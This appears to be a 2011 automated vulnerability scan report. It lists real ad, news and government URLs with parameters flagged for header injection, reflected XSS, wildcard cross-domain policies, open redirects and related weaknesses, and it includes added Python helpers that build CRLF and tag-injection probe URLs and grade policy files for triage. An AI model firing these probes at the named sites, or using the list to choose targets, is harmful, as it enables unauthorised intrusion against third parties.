XSS, Reflected Cross Site Scripting, CWE-79, CAPEC-86, DORK, GHDB, 05092011-03

Hoyt LLC Research investigates and reports on security vulnerabilities embedded in Web Applications and Products used in wide-scale deployment.

Report generated by XSS.CX at Mon May 09 10:47:30 CDT 2011.


Public Domain Vulnerability Information, Security Articles, Vulnerability Reports, GHDB, DORK Search


1. HTTP header injection

1.1. http://ad.doubleclick.net/ad/N4873.npr.og/B5461009 [REST URL parameter 1]

1.2. http://ad.doubleclick.net/adi/N4300.Google/B5350353.10 [REST URL parameter 1]

1.3. http://ad.doubleclick.net/adj/N2883.6441.USATODAY.COM/B5327539.11 [REST URL parameter 1]

1.4. http://ad.doubleclick.net/adj/cm.rub_usatoday/ [REST URL parameter 1]

1.5. http://ad.doubleclick.net/adj/ipc-csm/globalisation_US [REST URL parameter 1]

1.6. http://ad.doubleclick.net/adj/n6735.NPR/utility_search [REST URL parameter 1]

1.7. http://ad.doubleclick.net/dot.gif [REST URL parameter 1]

1.8. http://ad.doubleclick.net/pfadx/csmonitor_cim/ [name of an arbitrarily supplied request parameter]

1.9. http://ad.doubleclick.net/pfadx/csmonitor_cim/ [secure parameter]

1.10. http://bidder.mathtag.com/iframe/notify [exch parameter]

1.11. http://d7.zedo.com/bar/v16-406/d3/jsc/fmr.js [$ parameter]

1.12. http://tacoda.at.atwola.com/rtx/r.js [N cookie]

1.13. http://tacoda.at.atwola.com/rtx/r.js [si parameter]

1.14. http://tracker.bidder7.mookie1.com/tr-goog [u parameter]

2. Cross-site scripting (reflected)

2.1. http://480-adver-view.c3metrics.com/c3VTabstrct-6-2.php [cid parameter]

2.2. http://480-adver-view.c3metrics.com/c3VTabstrct-6-2.php [id parameter]

2.3. http://480-adver-view.c3metrics.com/c3VTabstrct-6-2.php [name of an arbitrarily supplied request parameter]

2.4. http://480-adver-view.c3metrics.com/c3VTabstrct-6-2.php [rv parameter]

2.5. http://480-adver-view.c3metrics.com/c3VTabstrct-6-2.php [t parameter]

2.6. http://480-adver-view.c3metrics.com/c3VTabstrct-6-2.php [uid parameter]

2.7. http://480-adver-view.c3metrics.com/v.js [cid parameter]

2.8. http://480-adver-view.c3metrics.com/v.js [id parameter]

2.9. http://480-adver-view.c3metrics.com/v.js [t parameter]

2.10. http://a.collective-media.net/adj/cm.rub_usatoday/ [REST URL parameter 2]

2.11. http://a.collective-media.net/adj/cm.rub_usatoday/ [name of an arbitrarily supplied request parameter]

2.12. http://a.collective-media.net/adj/cm.rub_usatoday/ [sz parameter]

2.13. http://ad.doubleclick.net/adi/N4300.Google/B5350353.10 [adurl parameter]

2.14. http://ad.doubleclick.net/adi/N4300.Google/B5350353.10 [ai parameter]

2.15. http://ad.doubleclick.net/adi/N4300.Google/B5350353.10 [client parameter]

2.16. http://ad.doubleclick.net/adi/N4300.Google/B5350353.10 [num parameter]

2.17. http://ad.doubleclick.net/adi/N4300.Google/B5350353.10 [sig parameter]

2.18. http://ad.doubleclick.net/adi/N4300.Google/B5350353.10 [sz parameter]

2.19. http://ad.doubleclick.net/adi/N4492.134426.1009314592321/B4140786.136 [adurl parameter]

2.20. http://ad.doubleclick.net/adi/N4492.134426.1009314592321/B4140786.136 [ai parameter]

2.21. http://ad.doubleclick.net/adi/N4492.134426.1009314592321/B4140786.136 [client parameter]

2.22. http://ad.doubleclick.net/adi/N4492.134426.1009314592321/B4140786.136 [num parameter]

2.23. http://ad.doubleclick.net/adi/N4492.134426.1009314592321/B4140786.136 [sig parameter]

2.24. http://ad.doubleclick.net/adi/N4492.134426.1009314592321/B4140786.136 [sz parameter]

2.25. http://ad.doubleclick.net/adi/N5895.133090.0460774079521/B4563625.8 [mt_adid parameter]

2.26. http://ad.doubleclick.net/adi/N5895.133090.0460774079521/B4563625.8 [mt_id parameter]

2.27. http://ad.doubleclick.net/adi/N5895.133090.0460774079521/B4563625.8 [mt_uuid parameter]

2.28. http://ad.doubleclick.net/adi/N5895.133090.0460774079521/B4563625.8 [name of an arbitrarily supplied request parameter]

2.29. http://ad.doubleclick.net/adi/N5895.133090.0460774079521/B4563625.8 [redirect parameter]

2.30. http://ad.doubleclick.net/adi/N5895.133090.0460774079521/B4563625.8 [sz parameter]

2.31. http://ad.doubleclick.net/adj/N2883.6441.USATODAY.COM/B5327539.11 [sz parameter]

2.32. http://ads.bridgetrack.com/a/f/ [click parameter]

2.33. http://ads.bridgetrack.com/a/f/ [click parameter]

2.34. http://ads.bridgetrack.com/a/f/ [name of an arbitrarily supplied request parameter]

2.35. http://ads.pointroll.com/PortalServe/ [r parameter]

2.36. http://ads.pointroll.com/PortalServe/ [redir parameter]

2.37. http://ads.pointroll.com/PortalServe/ [time parameter]

2.38. http://api-public.addthis.com/url/shares.json [callback parameter]

2.39. http://ar.voicefive.com/b/rc.pli [func parameter]

2.40. http://b.scorecardresearch.com/beacon.js [c1 parameter]

2.41. http://b.scorecardresearch.com/beacon.js [c15 parameter]

2.42. http://b.scorecardresearch.com/beacon.js [c2 parameter]

2.43. http://b.scorecardresearch.com/beacon.js [c3 parameter]

2.44. http://b.scorecardresearch.com/beacon.js [c4 parameter]

2.45. http://b.scorecardresearch.com/beacon.js [c5 parameter]

2.46. http://b.scorecardresearch.com/beacon.js [c6 parameter]

2.47. http://b3.mookie1.com/2/ZapTrader/ATT/Wired/Pros-Legacy/All/14a155dda-808a-4648-a03d-f65de2ef0ada@x90 [REST URL parameter 2]

2.48. http://b3.mookie1.com/2/ZapTrader/ATT/Wired/Pros-Legacy/All/14a155dda-808a-4648-a03d-f65de2ef0ada@x90 [REST URL parameter 3]

2.49. http://b3.mookie1.com/2/ZapTrader/ATT/Wired/Pros-Legacy/All/14a155dda-808a-4648-a03d-f65de2ef0ada@x90 [REST URL parameter 4]

2.50. http://b3.mookie1.com/2/ZapTrader/ATT/Wired/Pros-Legacy/All/14a155dda-808a-4648-a03d-f65de2ef0ada@x90 [REST URL parameter 5]

2.51. http://b3.mookie1.com/2/ZapTrader/ATT/Wired/Pros-Legacy/All/14a155dda-808a-4648-a03d-f65de2ef0ada@x90 [REST URL parameter 6]

2.52. http://b3.mookie1.com/2/ZapTrader/ATT/Wired/Pros-Legacy/All/14a155dda-808a-4648-a03d-f65de2ef0ada@x90 [REST URL parameter 7]

2.53. http://choices.truste.com/ca [c parameter]

2.54. http://choices.truste.com/ca [h parameter]

2.55. http://choices.truste.com/ca [iplc parameter]

2.56. http://choices.truste.com/ca [ox parameter]

2.57. http://choices.truste.com/ca [plc parameter]

2.58. http://choices.truste.com/ca [w parameter]

2.59. http://choices.truste.com/ca [zi parameter]

2.60. http://content.usatoday.com/apps/insidepage/crc.ashx [callback parameter]

2.61. http://d7.zedo.com/bar/v16-406/d3/jsc/fm.js [$ parameter]

2.62. http://d7.zedo.com/bar/v16-406/d3/jsc/fm.js [$ parameter]

2.63. http://d7.zedo.com/bar/v16-406/d3/jsc/fm.js [q parameter]

2.64. http://d7.zedo.com/bar/v16-406/d3/jsc/fm.js [q parameter]

2.65. http://d7.zedo.com/bar/v16-406/d3/jsc/fmr.js [$ parameter]

2.66. http://d7.zedo.com/bar/v16-406/d3/jsc/fmr.js [$ parameter]

2.67. http://d7.zedo.com/bar/v16-406/d3/jsc/fmr.js [q parameter]

2.68. http://d7.zedo.com/bar/v16-406/d3/jsc/fmr.js [q parameter]

2.69. http://data.usatoday.net/apps/InsidePage [url parameter]

2.70. http://data.usatoday.net/apps/InsidePage [url parameter]

2.71. http://data.usatoday.net/apps/InsidePage [var parameter]

2.72. http://ds.addthis.com/red/psi/sites/www.fox8live.com/p.json [callback parameter]

2.73. http://event.adxpose.com/event.flow [uid parameter]

2.74. http://finance.fox8live.com/inergize.wvue [Module parameter]

2.75. http://finance.fox8live.com/inergize.wvue [REST URL parameter 1]

2.76. http://finance.fox8live.com/inergize.wvue [name of an arbitrarily supplied request parameter]

2.77. http://fw.adsafeprotected.com/rjss/bs.serving-sys.com/9766/90645/BurstingPipe/adServer.bs [PluID parameter]

2.78. http://fw.adsafeprotected.com/rjss/bs.serving-sys.com/9766/90645/BurstingPipe/adServer.bs [REST URL parameter 2]

2.79. http://fw.adsafeprotected.com/rjss/bs.serving-sys.com/9766/90645/BurstingPipe/adServer.bs [REST URL parameter 3]

2.80. http://fw.adsafeprotected.com/rjss/bs.serving-sys.com/9766/90645/BurstingPipe/adServer.bs [REST URL parameter 4]

2.81. http://fw.adsafeprotected.com/rjss/bs.serving-sys.com/9766/90645/BurstingPipe/adServer.bs [REST URL parameter 5]

2.82. http://fw.adsafeprotected.com/rjss/bs.serving-sys.com/9766/90645/BurstingPipe/adServer.bs [REST URL parameter 6]

2.83. http://fw.adsafeprotected.com/rjss/bs.serving-sys.com/9766/90645/BurstingPipe/adServer.bs [c parameter]

2.84. http://fw.adsafeprotected.com/rjss/bs.serving-sys.com/9766/90645/BurstingPipe/adServer.bs [cn parameter]

2.85. http://fw.adsafeprotected.com/rjss/bs.serving-sys.com/9766/90645/BurstingPipe/adServer.bs [h parameter]

2.86. http://fw.adsafeprotected.com/rjss/bs.serving-sys.com/9766/90645/BurstingPipe/adServer.bs [name of an arbitrarily supplied request parameter]

2.87. http://fw.adsafeprotected.com/rjss/bs.serving-sys.com/9766/90645/BurstingPipe/adServer.bs [ncu parameter]

2.88. http://fw.adsafeprotected.com/rjss/bs.serving-sys.com/9766/90645/BurstingPipe/adServer.bs [ord parameter]

2.89. http://fw.adsafeprotected.com/rjss/bs.serving-sys.com/9766/90645/BurstingPipe/adServer.bs [pli parameter]

2.90. http://fw.adsafeprotected.com/rjss/bs.serving-sys.com/9766/90645/BurstingPipe/adServer.bs [w parameter]

2.91. http://i.usatoday.net/asp/usatly/handler.ashx [longUrl parameter]

2.92. http://ib.adnxs.com/ab [cnd parameter]

2.93. http://ib.adnxs.com/ptj [redir parameter]

2.94. http://k.collective-media.net/cmadj/cm.rub_usatoday/ [REST URL parameter 2]

2.95. http://radar.weather.gov/Conus/images/favicon.ico [REST URL parameter 3]

2.96. http://radar.weather.gov/Conus/images/favicon.ico [REST URL parameter 3]

2.97. http://radar.weather.gov/Conus/index.php [REST URL parameter 1]

2.98. http://radar.weather.gov/Conus/index.php [REST URL parameter 1]

2.99. http://radar.weather.gov/Conus/index.php [REST URL parameter 1]

2.100. http://radar.weather.gov/Conus/index.php [REST URL parameter 2]

2.101. http://radar.weather.gov/images/favicon.ico [REST URL parameter 2]

2.102. http://radar.weather.gov/images/favicon.ico [REST URL parameter 2]

2.103. http://radar.weather.gov/radar.php [REST URL parameter 1]

2.104. http://radar.weather.gov/radar.php [product parameter]

2.105. http://sitelife.usatoday.com/ver1.0/sys/jsonp.app [cb parameter]

2.106. http://sitelife.usatoday.com/ver1.0/sys/jsonp.app [plckcommentonkey parameter]

2.107. http://sitelife.usatoday.com/ver1.0/sys/jsonp.app [plckcommentonkeytype parameter]

2.108. http://w10.localadbuy.com/servlet/ajrotator/2735/0/vj [REST URL parameter 1]

2.109. http://w10.localadbuy.com/servlet/ajrotator/2735/0/vj [REST URL parameter 2]

2.110. http://w10.localadbuy.com/servlet/ajrotator/541/0/vj [REST URL parameter 1]

2.111. http://w10.localadbuy.com/servlet/ajrotator/541/0/vj [REST URL parameter 2]

2.112. http://w10.localadbuy.com/servlet/ajrotator/543/0/vj [REST URL parameter 1]

2.113. http://w10.localadbuy.com/servlet/ajrotator/543/0/vj [REST URL parameter 2]

2.114. http://w10.localadbuy.com/servlet/ajrotator/546/0/vj [REST URL parameter 1]

2.115. http://w10.localadbuy.com/servlet/ajrotator/546/0/vj [REST URL parameter 2]

2.116. http://w10.localadbuy.com/servlet/ajrotator/550/0/vj [REST URL parameter 1]

2.117. http://w10.localadbuy.com/servlet/ajrotator/550/0/vj [REST URL parameter 2]

2.118. http://w10.localadbuy.com/servlet/ajrotator/551/0/vj [REST URL parameter 1]

2.119. http://w10.localadbuy.com/servlet/ajrotator/551/0/vj [REST URL parameter 2]

2.120. http://wvue.web.entriq.net/nw/dpm/loadplayer/ [REST URL parameter 1]

2.121. http://wvue.web.entriq.net/nw/dpm/loadplayer/ [playerID parameter]

2.122. http://www.collegesurfing.com/searchbox-mge-us.php [id parameter]

2.123. http://www.csmonitor.com/Business [REST URL parameter 1]

2.124. http://www.csmonitor.com/Business/2011/0509/Gas-prices-start-to-head-down [REST URL parameter 1]

2.125. http://www.csmonitor.com/Business/2011/0509/Gas-prices-start-to-head-down [REST URL parameter 2]

2.126. http://www.csmonitor.com/Business/2011/0509/Gas-prices-start-to-head-down [REST URL parameter 3]

2.127. http://www.csmonitor.com/Business/2011/0509/Gas-prices-start-to-head-down [REST URL parameter 4]

2.128. http://www.fox8live.com/widgets/serve.aspx [name of an arbitrarily supplied request parameter]

2.129. http://www.macroaxis.com/widgets/url.jsp [name of an arbitrarily supplied request parameter]

2.130. http://www.macroaxis.com/widgets/url.jsp [s parameter]

2.131. http://www.macroaxis.com/widgets/url.jsp [t parameter]

2.132. http://www.npr.org/templates/reg/forgot-password-submit.php [public_user_email parameter]

2.133. http://www.therepublic.com/assets/gzip.php [f0 parameter]

2.134. http://www.therepublic.com/assets/gzip.php [f0 parameter]

2.135. http://www.therepublic.com/assets/gzip.php [f1 parameter]

2.136. http://www.therepublic.com/assets/gzip.php [f1 parameter]

2.137. http://www.therepublic.com/assets/gzip.php [f2 parameter]

2.138. http://www.therepublic.com/assets/gzip.php [f2 parameter]

2.139. http://www.therepublic.com/assets/gzip.php [f3 parameter]

2.140. http://www.therepublic.com/assets/gzip.php [name of an arbitrarily supplied request parameter]

2.141. http://www.therepublic.com/assets/gzip.php [name of an arbitrarily supplied request parameter]

2.142. http://fw.adsafeprotected.com/rjss/bs.serving-sys.com/9766/90645/BurstingPipe/adServer.bs [Referer HTTP header]

2.143. http://480-adver-view.c3metrics.com/c3VTabstrct-6-2.php [C3UID cookie]

2.144. http://ar.voicefive.com/bmx3/broker.pli [BMX_3PC cookie]

2.145. http://ar.voicefive.com/bmx3/broker.pli [BMX_G cookie]

2.146. http://ar.voicefive.com/bmx3/broker.pli [UID cookie]

2.147. http://ar.voicefive.com/bmx3/broker.pli [ar_p81479006 cookie]

2.148. http://ar.voicefive.com/bmx3/broker.pli [ar_p82806590 cookie]

2.149. http://ar.voicefive.com/bmx3/broker.pli [ar_p84552060 cookie]

2.150. http://ar.voicefive.com/bmx3/broker.pli [ar_p90175839 cookie]

2.151. http://ar.voicefive.com/bmx3/broker.pli [ar_p90452457 cookie]

2.152. http://ar.voicefive.com/bmx3/broker.pli [ar_p91136705 cookie]

2.153. http://ar.voicefive.com/bmx3/broker.pli [ar_p91300630 cookie]

2.154. http://ar.voicefive.com/bmx3/broker.pli [ar_p92429851 cookie]

2.155. http://ar.voicefive.com/bmx3/broker.pli [ar_p97174789 cookie]

2.156. http://ar.voicefive.com/bmx3/broker.pli [ar_s_p81479006 cookie]

2.157. http://d7.zedo.com/bar/v16-406/d3/jsc/fm.js [ZEDOIDA cookie]

2.158. http://d7.zedo.com/bar/v16-406/d3/jsc/fmr.js [ZEDOIDA cookie]

2.159. http://ib.adnxs.com/acb [acb145072 cookie]

2.160. http://ib.adnxs.com/acb [acb893170 cookie]

2.161. http://k.collective-media.net/cmadj/cm.rub_usatoday/ [cli cookie]

2.162. http://optimized-by.rubiconproject.com/a/4462/5032/7108-2.html [ruid cookie]
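The two lists above are scanner output: an entry under 1 means input supplied in that parameter reached a response header with its CR/LF intact, and an entry under 2 means input came back in the response body unencoded. Neither is confirmed exploitable until someone looks at the response. The following Python is an added verification helper written for this page; it is not code from XSS.CX, Hoyt LLC or the scanner. It builds a percent-encoded probe URL (CRLF must travel as %0D%0A), then classifies a captured raw response as header injection, raw body reflection, or safely encoded reflection. The probe strings, the host example.test and the sample responses are constructed for the example.

```python
from typing import List, Tuple
from urllib.parse import parse_qsl, quote, urlencode, urlsplit, urlunsplit

# Constructed probe values (not taken from the report). The CRLF probe tries
# to start a new response header; the tag probe tests HTML/JS body reflection.
CRLF_PROBE = "abc\r\nX-Injected: 1"
XSS_PROBE = "<xss>\"'"


def build_probe_url(url: str, param: str, probe: str) -> str:
    """Set `param` to the probe, percent-encoded so CR/LF travel as %0D%0A and
    are only decoded by the target application."""
    parts = urlsplit(url)
    query = dict(parse_qsl(parts.query, keep_blank_values=True))
    query[param] = probe
    return urlunsplit(parts._replace(query=urlencode(query, quote_via=quote)))


def parse_response(raw: bytes) -> Tuple[str, List[Tuple[str, str]], bytes]:
    """Split a raw HTTP response into status line, (name, value) headers, body."""
    head, _, body = raw.partition(b"\r\n\r\n")
    lines = head.decode("latin-1").split("\r\n")
    headers = []
    for line in lines[1:]:
        name, _, value = line.partition(":")
        headers.append((name.strip(), value.strip()))
    return lines[0], headers, body


def has_header_injection(raw: bytes, injected_name: str = "X-Injected") -> bool:
    """True when the CRLF in the probe produced a separate response header,
    i.e. the input reached a header (Location, Set-Cookie, ...) unfiltered."""
    _, headers, _ = parse_response(raw)
    return any(name.lower() == injected_name.lower() for name, _ in headers)


def reflection_context(raw: bytes, probe: str = XSS_PROBE) -> str:
    """Classify body reflection of the probe: 'raw' (unencoded; exploitable
    if the content type is rendered), 'encoded' (entity/percent/JS-escaped)
    or 'none'."""
    _, _, body = parse_response(raw)
    text = body.decode("latin-1")
    if probe in text:
        return "raw"
    encoded_forms = ("&lt;xss&gt;", "%3cxss%3e", "\\u003cxss\\u003e", "\\x3cxss\\x3e")
    if any(form in text.lower() for form in encoded_forms):
        return "encoded"
    return "none"


def content_type(raw: bytes) -> str:
    """Lower-cased media type. Raw reflection into text/html or a script type
    matters; into image/gif or a forced download it usually does not."""
    _, headers, _ = parse_response(raw)
    for name, value in headers:
        if name.lower() == "content-type":
            return value.split(";")[0].strip().lower()
    return ""


# Constructed sample responses, not captures from any host in the report.
VULN_HEADER = (b"HTTP/1.1 302 Found\r\n"
               b"Location: http://example.test/?r=abc\r\n"
               b"X-Injected: 1\r\n"
               b"Content-Length: 0\r\n\r\n")
VULN_BODY = (b"HTTP/1.1 200 OK\r\n"
             b"Content-Type: text/html; charset=utf-8\r\n\r\n"
             b"<script>var cid = \"<xss>\"'\";</script>")
SAFE_BODY = (b"HTTP/1.1 200 OK\r\n"
             b"Content-Type: text/html\r\n\r\n"
             b"<p>&lt;xss&gt;&quot;&#39;</p>")

if __name__ == "__main__":
    print(build_probe_url("http://example.test/ad?sz=728x90", "sz", CRLF_PROBE))
    print(has_header_injection(VULN_HEADER), reflection_context(VULN_BODY),
          content_type(VULN_BODY), reflection_context(SAFE_BODY))
```

Two caveats when triaging the lists above with this. Many of the header-injection hits are on ad redirectors, where the injected value lands in Location; whether a browser honours a smuggled header depends on the server actually emitting the bare CR/LF, so check the raw bytes rather than a rendered view. For the reflected entries, the callback, cb and func parameters are JSONP endpoints: a raw reflection there is script injection only if the response is served as a script type and the page embedding it is one the attacker cares about.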

3. Flash cross-domain policy

3.1. http://a.collective-media.net/crossdomain.xml

3.2. http://a1.interclick.com/crossdomain.xml

3.3. http://action.mathtag.com/crossdomain.xml

3.4. http://ad.amgdgt.com/crossdomain.xml

3.5. http://ad.doubleclick.net/crossdomain.xml

3.6. http://ads.pointroll.com/crossdomain.xml

3.7. http://amch.questionmarket.com/crossdomain.xml

3.8. http://analytics.newsinc.com/crossdomain.xml

3.9. http://ar.voicefive.com/crossdomain.xml

3.10. http://assets1.grouponcdn.com/crossdomain.xml

3.11. http://at.amgdgt.com/crossdomain.xml

3.12. http://b.scorecardresearch.com/crossdomain.xml

3.13. http://b.voicefive.com/crossdomain.xml

3.14. http://b3.mookie1.com/crossdomain.xml

3.15. http://bh.contextweb.com/crossdomain.xml

3.16. http://bs.serving-sys.com/crossdomain.xml

3.17. http://cache-01.cleanprint.net/crossdomain.xml

3.18. http://cdn.gigya.com/crossdomain.xml

3.19. http://cdn.interclick.com/crossdomain.xml

3.20. http://cdn.taboolasyndication.com/crossdomain.xml

3.21. http://cr0.worthathousandwords.com/crossdomain.xml

3.22. http://d7.zedo.com/crossdomain.xml

3.23. http://ds.serving-sys.com/crossdomain.xml

3.24. http://event.adxpose.com/crossdomain.xml

3.25. http://finance.fox8live.com/crossdomain.xml

3.26. http://fls.doubleclick.net/crossdomain.xml

3.27. http://fw.adsafeprotected.com/crossdomain.xml

3.28. http://gannett.gcion.com/crossdomain.xml

3.29. http://gscounters.gigya.com/crossdomain.xml

3.30. http://ib.adnxs.com/crossdomain.xml

3.31. http://ic.nexac.com/crossdomain.xml

3.32. http://idcs.interclick.com/crossdomain.xml

3.33. http://k.collective-media.net/crossdomain.xml

3.34. http://log30.doubleverify.com/crossdomain.xml

3.35. http://map.media6degrees.com/crossdomain.xml

3.36. http://metrics.csmonitor.com/crossdomain.xml

3.37. http://metrics.npr.org/crossdomain.xml

3.38. http://mobile.fox8live.com/crossdomain.xml

3.39. http://pix04.revsci.net/crossdomain.xml

3.40. http://pixel.quantserve.com/crossdomain.xml

3.41. http://radar.weather.gov/crossdomain.xml

3.42. http://s.meebocdn.net/crossdomain.xml

3.43. http://s0.2mdn.net/crossdomain.xml

3.44. http://secure-us.imrworldwide.com/crossdomain.xml

3.45. http://segment-pixel.invitemedia.com/crossdomain.xml

3.46. http://spd.pointroll.com/crossdomain.xml

3.47. http://speed.pointroll.com/crossdomain.xml

3.48. http://stp.fox8live.com/crossdomain.xml

3.49. http://t.mookie1.com/crossdomain.xml

3.50. http://t.pointroll.com/crossdomain.xml

3.51. http://trc.taboolasyndication.com/crossdomain.xml

3.52. http://usatoday1.112.2o7.net/crossdomain.xml

3.53. http://va.px.invitemedia.com/crossdomain.xml

3.54. http://w10.localadbuy.com/crossdomain.xml

3.55. http://widget.newsinc.com/crossdomain.xml

3.56. http://wvue.web.entriq.net/crossdomain.xml

3.57. http://www.fox8live.com/crossdomain.xml

3.58. http://www.groupon.com/crossdomain.xml

3.59. https://www.groupon.com/crossdomain.xml

3.60. http://xedge.aperture.displaymarketplace.com/crossdomain.xml

3.61. http://adadvisor.net/crossdomain.xml

3.62. http://ads.bridgetrack.com/crossdomain.xml

3.63. http://content.usatoday.com/crossdomain.xml

3.64. http://contextweb.usatoday.net/crossdomain.xml

3.65. http://data.usatoday.net/crossdomain.xml

3.66. http://googleads.g.doubleclick.net/crossdomain.xml

3.67. http://i.usatoday.net/crossdomain.xml

3.68. http://optimized-by.rubiconproject.com/crossdomain.xml

3.69. http://pagead2.googlesyndication.com/crossdomain.xml

3.70. http://pubads.g.doubleclick.net/crossdomain.xml

3.71. http://rd.meebo.com/crossdomain.xml

3.72. http://share.meebo.com/crossdomain.xml

3.73. http://static.ak.fbcdn.net/crossdomain.xml

3.74. http://syndication.mmismm.com/crossdomain.xml

3.75. http://videos.usatoday.net/crossdomain.xml

3.76. http://www.collegesurfing.com/crossdomain.xml

3.77. http://www.facebook.com/crossdomain.xml

3.78. http://www.meebo.com/crossdomain.xml

3.79. http://www.npr.org/crossdomain.xml

3.80. http://www.usatoday.com/crossdomain.xml

3.81. http://api.twitter.com/crossdomain.xml

4. Silverlight cross-domain policy

4.1. http://ad.doubleclick.net/clientaccesspolicy.xml

4.2. http://ads.pointroll.com/clientaccesspolicy.xml

4.3. http://b.scorecardresearch.com/clientaccesspolicy.xml

4.4. http://b.voicefive.com/clientaccesspolicy.xml

4.5. http://content.usatoday.com/clientaccesspolicy.xml

4.6. http://contextweb.usatoday.net/clientaccesspolicy.xml

4.7. http://data.usatoday.net/clientaccesspolicy.xml

4.8. http://i.usatoday.net/clientaccesspolicy.xml

4.9. http://metrics.csmonitor.com/clientaccesspolicy.xml

4.10. http://metrics.npr.org/clientaccesspolicy.xml

4.11. http://s0.2mdn.net/clientaccesspolicy.xml

4.12. http://secure-us.imrworldwide.com/clientaccesspolicy.xml

4.13. http://spd.pointroll.com/clientaccesspolicy.xml

4.14. http://speed.pointroll.com/clientaccesspolicy.xml

4.15. http://usatoday1.112.2o7.net/clientaccesspolicy.xml

4.16. http://www.usatoday.com/clientaccesspolicy.xml
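Sections 3 and 4 list every crossdomain.xml and clientaccesspolicy.xml the scanner found, not only permissive ones. The finding matters when the policy trusts every origin (domain="*", or a Silverlight uri of "*" or "http://*"), because a Flash or Silverlight object on any site can then make cookie-bearing requests to that host and read the responses. The Python below is an added example written for this page, not code from the report's authors or from either plugin vendor; it parses both policy formats and grades them, including the Flash secure="false" attribute that lets plain-http origins read an https policy. The sample policies and the example.test names are constructed.

```python
import xml.etree.ElementTree as ET
from typing import Dict, List


def _host_pattern(value: str) -> str:
    """Strip scheme and whitespace so Flash 'domain' and Silverlight 'uri'
    values can be compared the same way."""
    v = value.strip().lower()
    for scheme in ("https://", "http://"):
        if v.startswith(scheme):
            v = v[len(scheme):]
    return v


def _risk(domains: List[str]) -> str:
    """'wildcard': any origin may read responses with the user's cookies;
    'broad': a whole subdomain tree is trusted; 'restrictive' otherwise."""
    patterns = [_host_pattern(d) for d in domains]
    if any(p == "*" for p in patterns):
        return "wildcard"
    if any(p.startswith("*.") for p in patterns):
        return "broad"
    return "restrictive"


def assess_flash_policy(xml_text: str) -> Dict[str, object]:
    """Evaluate a crossdomain.xml: collect allow-access-from domains and note
    secure="false", which lets plain-http origins read https responses."""
    root = ET.fromstring(xml_text)
    domains, secure_false = [], False
    for el in root.iter("allow-access-from"):
        domains.append(el.get("domain", ""))
        if el.get("secure", "true").lower() == "false":
            secure_false = True
    return {"domains": domains, "risk": _risk(domains), "secure_false": secure_false}


def assess_silverlight_policy(xml_text: str) -> Dict[str, object]:
    """Evaluate a clientaccesspolicy.xml: every <domain uri=...> under
    <allow-from> is a trusted origin."""
    root = ET.fromstring(xml_text)
    domains = [el.get("uri", "") for el in root.iter("domain")]
    return {"domains": domains, "risk": _risk(domains)}


# Constructed sample policies, not fetched from any host in the report.
WILDCARD_FLASH = """<?xml version="1.0"?>
<cross-domain-policy>
  <allow-access-from domain="*" secure="false"/>
</cross-domain-policy>"""

RESTRICTIVE_FLASH = """<?xml version="1.0"?>
<cross-domain-policy>
  <allow-access-from domain="www.example.test"/>
  <allow-access-from domain="static.example.test"/>
</cross-domain-policy>"""

BROAD_SILVERLIGHT = """<?xml version="1.0"?>
<access-policy>
  <cross-domain-access>
    <policy>
      <allow-from http-request-headers="*">
        <domain uri="http://*.example.test"/>
      </allow-from>
      <grant-to>
        <resource path="/" include-subpaths="true"/>
      </grant-to>
    </policy>
  </cross-domain-access>
</access-policy>"""

if __name__ == "__main__":
    print(assess_flash_policy(WILDCARD_FLASH))
    print(assess_flash_policy(RESTRICTIVE_FLASH))
    print(assess_silverlight_policy(BROAD_SILVERLIGHT))
```

A wildcard policy on a pure ad or pixel host exposes little beyond the tracking cookie. The same policy on a host that also serves logged-in content (several of the publisher domains in section 3 do) is the case to escalate, since it hands any third-party site read access to that content with the victim's session.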

5. Cleartext submission of password

5.1. http://www.therepublic.com/login/

5.2. http://www.therepublic.com/login/register/

6. SSL cookie without secure flag set

6.1. https://shop.npr.org/index.php

6.2. https://www.groupon.com/dallas/

6.3. https://www.groupon.com/learn

6.4. https://www.groupon.com/login

6.5. https://www.groupon.com/mobile

6.6. https://www.groupon.com/users

6.7. https://www.groupon.com/users/new

7. Session token in URL

7.1. http://login.npr.org/openid/embed

7.2. http://www.facebook.com/extern/login_status.php

7.3. http://www.npr.org/templates/reg/login.php

8. ASP.NET ViewState without MAC enabled

8.1. http://mobile.fox8live.com/BlackBerry/default.aspx

8.2. http://mobile.fox8live.com/business/story/McDonalds-sales-figure-rises-in-April/R4RfiqAYuEi3vjN-k7UjyA.cspx

8.3. http://mobile.fox8live.com/default.aspx

8.4. http://mobile.fox8live.com/news/local/story/Bonnet-Carre-Spillway-impact-on-Lake-Pontchartrain/ywVthjF5R0-TVfelFm18GA.cspx

8.5. http://mobile.fox8live.com/news/local/story/Mississippi-River-could-crest-Monday-at-Memphis/-sFvNvd1p0GN8i4ye5E8eA.cspx

8.6. http://mobile.fox8live.com/sports/default.aspx

8.7. http://mobile.fox8live.com/sports/story/Preds-try-to-stay-alive-in-Game-6-against/05o1Jx8CaEW77q1kiAhtgA.cspx

8.8. http://mobile.fox8live.com/weather/default.aspx

8.9. http://www.fox8live.com/business/default.aspx

8.10. http://www.fox8live.com/business/iframe_financialticker.aspx

8.11. http://www.fox8live.com/business/iframe_indexwatch.aspx

8.12. http://www.fox8live.com/content/aboutus/default.aspx

8.13. http://www.fox8live.com/content/news/lee_zurik_investigation/default.aspx

8.14. http://www.fox8live.com/content/news/seregni/default.aspx

8.15. http://www.fox8live.com/content/news/watercooler/default.aspx

8.16. http://www.fox8live.com/default.aspx

8.17. http://www.fox8live.com/entertainment/horoscopes/default.aspx

8.18. http://www.fox8live.com/mostpopular/story/Bonnet-Carre-Spillway-impact-on-Lake-Pontchartrain/ywVthjF5R0-TVfelFm18GA.cspx

8.19. http://www.fox8live.com/news/local/story/St-Bernard-prepares-for-rising-Mississippi-River/vJUO9a9n60iNAXZ6QCm2oQ.cspx

8.20. http://www.fox8live.com/rss/default.aspx

8.21. http://www.fox8live.com/widgets/serve.aspx

8.22. http://www.fox8live.com/wireless/default.aspx

9. Open redirection

9.1. http://bh.contextweb.com/bh/rtset [rurl parameter]

9.2. http://fw.adsafeprotected.com/rfw/bs.serving-sys.com/9766/90645/BurstingPipe/adServer.bs [REST URL parameter 2]

9.3. http://trc.taboolasyndication.com/log/usatoday/debug [url parameter]

9.4. http://trc.taboolasyndication.com/usatoday/log/2/available [url parameter]

9.5. http://trc.taboolasyndication.com/usatoday/log/2/display [url parameter]

9.6. http://trc.taboolasyndication.com/usatoday/log/2/visible [url parameter]

9.7. https://www.groupon.com/users [Referer HTTP header]
